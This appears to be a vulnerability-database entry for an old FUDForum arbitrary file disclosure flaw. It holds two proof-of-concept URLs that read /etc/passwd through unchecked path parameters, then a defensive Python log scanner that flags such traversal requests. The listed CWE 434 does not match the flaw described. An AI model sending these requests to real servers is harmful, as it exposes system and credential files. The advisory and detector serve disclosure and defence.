Vendor: FUDForum
By: SecurityFocus
CVSS: 7.5 (HIGH)
Vulnerability: Arbitrary File Disclosure
CWE: 434
Product Name: FUDForum
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

FUDForum Arbitrary File Disclosure Vulnerability

FUDForum is vulnerable to arbitrary file disclosure due to a lack of path validation. An attacker can make malicious requests via URI parameters to access sensitive files.

Mitigation:

Ensure that FUDForum is up to date and that all path validation is properly implemented.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5501/info

Reportedly, FUDForum may disclose contents of arbitrary files to attackers. The vulnerability is the result of FUDForum failing to check the path of the file that is being requested. By simply making malicious requests via URI parameters, an attacker is able to obtain access to potentially sensitive files.

http://victimhost.com/tmp_view.php?file=/etc/passwd
http://victimhost.com/admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]
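
A log check for the two request patterns quoted above, added here as an example and not taken from FUDForum, Exploit-DB or SecurityFocus: it flags requests to `tmp_view.php` and `admbrowse.php` whose path parameters resolve outside the forum directory. `ALLOWED_ROOT`, the access-log format and the sample lines are assumptions constructed for illustration.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs

# Assumption: the forum's install directory; nothing outside it should be served.
ALLOWED_ROOT = "/var/www/forum"

# Script -> query parameters forming the requested path (names from the advisory URLs).
PATH_PARAMS = {"tmp_view.php": ("file",), "admbrowse.php": ("cur", "dest")}

# Constructed access-log lines (Common Log Format, documentation IP range).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /tmp_view.php?file=/etc/passwd HTTP/1.1" 200 1432',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=abc HTTP/1.1" 200 1432',
    '192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] "GET /tmp_view.php?file=tmp/upload_1.txt HTTP/1.1" 200 88',
    '192.0.2.12 - - [01/Jan/2024:10:02:00 +0000] "GET /tmp_view.php?file=..%2Fbackup.sql HTTP/1.1" 404 0',
    '192.0.2.13 - - [01/Jan/2024:10:03:00 +0000] "GET /index.php?t=msg HTTP/1.1" 200 5000',
]

def requested_path(url):
    """Return the normalised path a request asks for, or None if not applicable."""
    parts = urlsplit(url)
    names = PATH_PARAMS.get(posixpath.basename(parts.path))
    if names is None:
        return None
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    pieces = [query.get(name, [""])[0] for name in names]
    if not any(pieces):
        return None
    # An absolute piece replaces the root; normpath then collapses "../".
    return posixpath.normpath(posixpath.join(ALLOWED_ROOT, *pieces))

def outside_root(path):
    return path != ALLOWED_ROOT and not path.startswith(ALLOWED_ROOT + "/")

def scan(log_lines):
    """Return (client, resolved_path) for requests resolving outside ALLOWED_ROOT."""
    hits = []
    for line in log_lines:
        quoted = line.split('"')
        request = quoted[1].split() if len(quoted) > 2 else []
        if len(request) < 2:
            continue
        path = requested_path(request[1])
        if path is not None and outside_root(path):
            hits.append((line.split()[0], path))
    return hits

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The check works on the logged request string only, so it does not account for symlinks on the server's filesystem.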